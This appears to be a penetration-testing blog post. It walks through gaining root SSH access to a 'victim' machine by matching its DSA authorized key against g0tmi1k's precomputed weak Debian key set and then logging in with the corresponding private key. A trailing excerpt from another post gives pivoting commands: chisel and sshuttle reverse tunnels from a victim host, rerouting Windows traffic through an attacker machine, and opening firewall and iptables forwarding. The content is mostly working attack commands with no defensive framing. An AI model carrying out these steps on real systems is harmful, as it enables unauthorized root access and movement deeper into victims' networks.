Skip to main content

Using SSH-DSS authorized keys to login to SSH Server without password


For this method to work, you need to have the authorized key of the victim machine


cat authorized_keys

ssh-dss AAAAB3NzaC1kc3MAAACBAOgzzMCD3Im5bRnAVdV3yLwTs................................ 


SSH-DSS is disabled on new versions of SSH, so you need to enable it
nano /etc/ssh/ssh_config

PubkeyAcceptedKeyTypes +ssh-dss
git clone https://github.com/g0tmi1k/debian-ssh
tar vjxf debian-ssh/common_keys/debian_ssh_dsa_1024_x86.tar.bz2

cd /dss/1024


Copy first few characters from the authorized keys and we going to search for the key from the list of keys we downloaded earlier
grep -lr 'AAAAB3Ndskkdsjhfodsi4m5adsa6d5s8RadSsdsWassd3rhf6gySd2sdS34rW'

you can see some file with random characters with .pub file; ex: e2eb2172a62d0d7e40f210g6167f65ca-12345.pub

But, what we need is not a public key - we need private key to login :)

so, search for it again
ls -la | grep e2eb2172a62d0
Now you can see two files one private key and one public key;

use e2eb2172a62d0d7e40f210g6167f65ca-12345 Private key to login with ssh
chmod 400 e2eb2172a62d0d7e40f210g6167f65ca-12345
ssh -i e2eb2172a62d0d7e40f210g6167f65ca-12345 root@IP_Address 















Comments

Popular posts from this blog

Pivoting into an internal network behind firewall

    Accessing a Victim network from Windows box which is pivoted to Kali #On Kali sshuttle --listen 0.0.0.0 -r user@10.10.10.10 192.168.1.0/24 or ./chisel server --port 9001 -reverse #On Victim ./chisel.exe client 10.10.10.1:9001 R:0.0.0.0:1080:socks .\chisel.exe client 10.10.10.1:9001 R:8080:127.0.0.1:8080 R:8888:127.0.0.1:8888 R:9090:127.0.0.1:9090 #On windows route print #delete default route route delete 0.0.0.0 #add a new route to kali- setting kali ip as gateway; kali_ip=which is on the same subnet as the windows box route add 0.0.0.0 mask 0.0.0.0 KALI_IP #Now you should be able to access all the sites which are accessible on kali from windows box. #If the above doesnt work #asuming Kali and windows are on Eht0 #add a firewall rule to allow Kali ip traffic netsh advfirewall firewall add rule name="Allow VPN Traffic" dir=in action=allow protocol=any remoteip=KALI_ETH0_IP #on Kali - Allow tun0 traffic to forward on iptables sudo iptables -P FORWARD ACCEPT ...